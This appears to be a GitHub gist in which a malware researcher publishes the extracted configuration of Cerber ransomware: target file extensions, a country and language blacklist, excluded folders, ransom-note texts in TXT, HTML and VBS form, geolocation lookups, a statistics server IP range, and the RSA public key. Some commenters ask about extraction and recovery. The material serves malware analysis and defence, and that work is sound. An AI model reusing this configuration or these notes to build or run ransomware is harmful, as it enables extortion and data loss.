Skip to content

Instantly share code, notes, and snippets.

@hasherezade

hasherezade/config.json Secret

Last active June 14, 2022 14:50
Star
Embed
What would you like to do?
Learn more about clone URLs
Download ZIP
cerber ransomware
Raw
config.json
{
"antiav": 1,
"blacklist": {
"countries": [
"am",
"az",
"by",
"ge",
"kg",
"kz",
"md",
"ru",
"tm",
"tj",
"ua",
"uz"
],
"files": [
"bootsect.bak",
"iconcache.db",
"thumbs.db",
"wallet.dat"
],
"folders": [
":\\$recycle.bin\\",": \\$windows.~bt\\",
":\\boot\\",": \\drivers\\",
":\\program files\\",": \\program files (x86)\\",
":\\programdata\\",": \\users\\all users\\",
":\\windows\\","\\appdata\\local\\",
"\\appdata\\locallow\\","\\appdata\\roaming\\",
"\\public\\music\\sample music\\","\\public\\pictures\\sample pictures\\",
"\\public\\videos\\sample videos\\","\\tor browser\\"
],
"languages": [
1049,
1058,
1059,
1064,
1067,
1068,
1079,
1087,
1088,
1090,
1091,
2072,
2073,
2092,
2115
]
},
"check": {
"activity": 0,
"country": 1,
"language": 1,
"vmware": 0
},
"debug": 0,
"encrypt": {
"files": [
[
".contact",
".dbx",
".doc",
".docx",
".jnt",
".jpg",
".mapimail",
".msg",
".oab",
".ods",
".pdf",
".pps",
".ppsm",
".ppt",
".pptm",
".prf",
".pst",
".rar",
".rtf",
".txt",
".wab",
".xls",
".xlsx",
".xml",
".zip",
".1cd",
".3ds",
".3g2",
".3gp",
".7z",
".7zip",
".accdb",
".aoi",
".asf",
".asp",
".aspx",
".asx",
".avi",
".bak",
".cer",
".cfg",
".class",
".config",
".css",
".csv",
".db",
".dds",
".dwg",
".dxf",
".flf",
".flv",
".html",
".idx",
".js",
".key",
".kwm",
".laccdb",
".ldf",
".lit",
".m3u",
".mbx",
".md",
".mdf",
".mid",
".mlb",
".mov",
".mp3",
".mp4",
".mpg",
".obj",
".odt",
".pages",
".php",
".psd",
".pwm",
".rm",
".safe",
".sav",
".save",
".sql",
".srt",
".swf",
".thm",
".vob",
".wav",
".wma",
".wmv",
".xlsb",
".3dm",
".aac",
".ai",
".arw",
".c",
".cdr",
".cls",
".cpi",
".cpp",
".cs",
".db3",
".docm",
".dot",
".dotm",
".dotx",
".drw",
".dxb",
".eps",
".fla",
".flac",
".fxg",
".java",
".m",
".m4v",
".max",
".mdb",
".pcd",
".pct",
".pl",
".potm",
".potx",
".ppam",
".ppsm",
".ppsx",
".pptm",
".ps",
".pspimage",
".r3d",
".rw2",
".sldm",
".sldx",
".svg",
".tga",
".wps",
".xla",
".xlam",
".xlm",
".xlr",
".xlsm",
".xlt",
".xltm",
".xltx",
".xlw",
".act",
".adp",
".al",
".bkp",
".blend",
".cdf",
".cdx",
".cgm",
".cr2",
".crt",
".dac",
".dbf",
".dcr",
".ddd",
".design",
".dtd",
".fdb",
".fff",
".fpx",
".h",
".iif",
".indd",
".jpeg",
".mos",
".nd",
".nsd",
".nsf",
".nsg",
".nsh",
".odc",
".odp",
".oil",
".pas",
".pat",
".pef",
".pfx",
".ptx",
".qbb",
".qbm",
".sas7bdat",
".say",
".st4",
".st6",
".stc",
".sxc",
".sxw",
".tlg",
".wad",
".xlk",
".aiff",
".bin",
".bmp",
".cmt",
".dat",
".dit",
".edb",
".flvv",
".gif",
".groups",
".hdd",
".hpp",
".log",
".m2ts",
".m4p",
".mkv",
".mpeg",
".ndf",
".nvram",
".ogg",
".ost",
".pab",
".pdb",
".pif",
".png",
".qed",
".qcow",
".qcow2",
".rvt",
".st7",
".stm",
".vbox",
".vdi",
".vhd",
".vhdx",
".vmdk",
".vmsd",
".vmx",
".vmxf",
".3fr",
".3pr",
".ab4",
".accde",
".accdr",
".accdt",
".ach",
".acr",
".adb",
".ads",
".agdl",
".ait",
".apj",
".asm",
".awg",
".back",
".backup",
".backupdb",
".bank",
".bay",
".bdb",
".bgt",
".bik",
".bpw",
".cdr3",
".cdr4",
".cdr5",
".cdr6",
".cdrw",
".ce1",
".ce2",
".cib",
".craw",
".crw",
".csh",
".csl",
".db_journal",
".dc2",
".dcs",
".ddoc",
".ddrw",
".der",
".des",
".dgc",
".djvu",
".dng",
".drf",
".dxg",
".eml",
".erbsql",
".erf",
".exf",
".ffd",
".fh",
".fhd",
".gray",
".grey",
".gry",
".hbk",
".ibank",
".ibd",
".ibz",
".iiq",
".incpas",
".jpe",
".kc2",
".kdbx",
".kdc",
".kpdx",
".lua",
".mdc",
".mef",
".mfw",
".mmw",
".mny",
".moneywell",
".mrw",
".myd",
".ndd",
".nef",
".nk2",
".nop",
".nrw",
".ns2",
".ns3",
".ns4",
".nwb",
".nx2",
".nxl",
".nyf",
".odb",
".odf",
".odg",
".odm",
".orf",
".otg",
".oth",
".otp",
".ots",
".ott",
".p12",
".p7b",
".p7c",
".pdd",
".pem",
".plus_muhd",
".plc",
".pot",
".pptx",
".psafe3",
".py",
".qba",
".qbr",
".qbw",
".qbx",
".qby",
".raf",
".rat",
".raw",
".rdb",
".rwl",
".rwz",
".s3db",
".sd0",
".sda",
".sdf",
".sqlite",
".sqlite3",
".sqlitedb",
".sr2",
".srf",
".srw",
".st5",
".st8",
".std",
".sti",
".stw",
".stx",
".sxd",
".sxg",
".sxi",
".sxm",
".tex",
".wallet",
".wb2",
".wpd",
".x11",
".x3f",
".xis",
".ycbcra",
".yuv"
]
],
"network": 0,
"new_extension": ".cerber",
"max_block_size": 2,
"max_blocks": 5,
"min_file_size": 0,
"multithread": 1,
"rsa_key_size": 576
},
"global_public_key": "LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FROEFNSUlCQ2dLQ0FRRUF2a3R5NXFocUV5ZFI5MDc2RmV2cAowdU1QN0laTm1zMUFBN0dQUVVUaE1XYllpRVlJaEJLY1QwL253WXJCcTBPZ3Y3OUsxdHRhMDRFSFRyWGdjQXAvCk9KZ0JoejlONThhZXdkNHlaQm0yY29lYURHdmNHUkFjOWU3Mk9iRlEvVE1FL0lvN0xaNXFYRFd6RGFmSThMQTgKSlFtU3owTCsvRytMUFRXZzdrUE9wSlQ3V1NrUmI5VDh3NVFnWlJKdXZ2aEVySE04M2tPM0VMVEgrU29FSTUzcAo0RU5Wd2ZOTkVwT3BucE9PU0tRb2J0SXc1NkNzUUZyaGFjMHNRbE9qZWsvbXVWbHV4amlFbWMwZnN6azJXTFNuCnFyeWlNeXphSTVEV0JEallLWEExdHAyaC95Z2JrWWRGWVJiQUVxd3RMeFQyd01mV1BRSTVPa2hUYTl0WnFEMEgKblFJREFRQUIKLS0tLS1FTkQgUFVCTElDIEtFWS0tLS0tCg==",
"help_files": {
"files": [
{
"file_body": "\r\n\r\n C E R B E R\r\n -----------\r\n\r\n\r\n Your documents, photos, databases and other important files have been encrypted!\r\n\r\n\r\n To decrypt your files follow the instructions:\r\n\r\n\r\n ---------------------------------------------------------------------------------------\r\n\r\n\r\n 1. Download and install the \"Tor Browser\" from https:\/\/www.torproject.org\/\r\n\r\n\r\n 2. Run it\r\n\r\n\r\n 3. In the \"Tor Browser\" open website:\r\n\r\n http:\/\/decrypttozxybarc.onion\/{PC_ID}\r\n\r\n\r\n 4. Follow the instructions at this website\r\n\r\n\r\n ---------------------------------------------------------------------------------------\r\n\r\n\r\n \u00c2\u00ab...Quod me non necat me fortiorem facit.\u00c2\u00bb\r\n",
"file_extension": ".txt"
},
{
"file_body": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n <head>\r\n <link href=\"http:\/\/maxcdn.bootstrapcdn.com\/bootstrap\/3.3.5\/css\/bootstrap.min.css\" rel=\"stylesheet\">\r\n <meta charset=\"utf-8\">\r\n <meta content=\"IE=edge\" http-equiv=\"X-UA-Compatible\">\r\n <meta content=\"width=device-width, initial-scale=1\" name=\"viewport\">\r\n <title>C E R B E R<\/title>\r\n <\/head>\r\n <body>\r\n <div class=\"container\">\r\n <h3 align=\"center\">C E R B E R<\/h3>\r\n <br \/>\r\n <h4>Your documents, photos, databases and other important files have been encrypted!<br \/><br \/>To decrypt your files follow the instructions:<\/h4>\r\n <br \/>\r\n <div class=\"well\">\r\n <h4>1.&nbsp;&nbsp;&nbsp;Download and install the &laquo;Tor Browser&raquo; from <a href=\"https:\/\/www.torproject.org\/download\/download-easy.html.en\" target=\"_blank\">https:\/\/www.torproject.org\/<\/a><\/h4>\r\n <br \/>\r\n <h4>2.&nbsp;&nbsp;&nbsp;Run it<\/h4>\r\n <br \/>\r\n <h4>3.&nbsp;&nbsp;&nbsp;In the &laquo;Tor Browser&raquo; open website:<br \/><br \/><div class=\"form-group\" style=\"margin: 0 32px 36px 32px;\"><input class=\"form-control\" style=\"color: #c24; font-size: 22px; height: 50px; text-align: center;\" type=\"text\" value=\"http:\/\/decrypttozxybarc.onion\/{PC_ID}\" readonly><\/div><\/h4>\r\n <h4>4.&nbsp;&nbsp;&nbsp;Follow the instructions at this website<\/h4>\r\n <\/div>\r\n <br \/>\r\n <p style=\"color: #ccc;\">&laquo;...Quod me non necat me fortiorem facit.&raquo;<\/p>\r\n <br \/>\r\n <\/div>\r\n <\/body>\r\n<\/html>\r\n",
"file_extension": ".html"
},
{
"file_body": "Set SAPI = CreateObject(\"SAPI.SpVoice\")\r\nSAPI.Speak \"Attention! Attention! Attention!\"\r\nFor i = 1 to 5\r\nSAPI.Speak \"Your documents, photos, databases and other important files have been encrypted!\"\r\nNext",
"file_extension": ".vbs"
}
],
"files_name": "# DECRYPT MY FILES #"
},
"ip_geo": [
{
"property_name": "country",
"url": "http:\/\/ipinfo.io\/json"
},
{
"property_name": "country_code",
"url": "http:\/\/freegeoip.net\/json\/"
},
{
"property_name": "countryCode",
"url": "http:\/\/ip-api.com\/json"
}
],
"servers": {
"statistics": {
"data_finish": "{MD5_KEY}",
"data_start": "{MD5_KEY}{PARTNER_ID}{OS}{IS_X64}{IS_ADMIN}{COUNT_FILES}{STOP_REASON}",
"ip": "87.98.128.0\/19",
"port": 6891,
"send_stat": 1,
"timeout": 1020
}
}
}
Raw
public_key.key
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvkty5qhqEydR9076Fevp
0uMP7IZNms1AA7GPQUThMWbYiEYIhBKcT0/nwYrBq0Ogv79K1tta04EHTrXgcAp/
OJgBhz9N58aewd4yZBm2coeaDGvcGRAc9e72ObFQ/TME/Io7LZ5qXDWzDafI8LA8
JQmSz0L+/G+LPTWg7kPOpJT7WSkRb9T8w5QgZRJuvvhErHM83kO3ELTH+SoEI53p
4ENVwfNNEpOpnpOOSKQobtIw56CsQFrhac0sQlOjek/muVluxjiEmc0fszk2WLSn
qryiMyzaI5DWBDjYKXA1tp2h/ygbkYdFYRbAEqwtLxT2wMfWPQI5OkhTa9tZqD0H
nQIDAQAB
-----END PUBLIC KEY-----
@kjwunderle
Copy link

I've got some recovered 'getKeys' files from an infected HD, and a 'listFiles' one too. Attached for investigation. I added filetype extension in order to upload since they had none, I can share the originals if necessary; these are not jpeg files, they are of unknown type.

getkeys
listfiles

@jwilczek
Copy link

Can you share how you extracted this from the EXE?

@Gundo2020
Copy link

Hi Guys,

I got infected with Ransom virus last weekend and i managed to clean my laptop (apparently) but im stuck with the encrypted files.
Is there any software who can allow me to recover them?
Thank you in advance

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment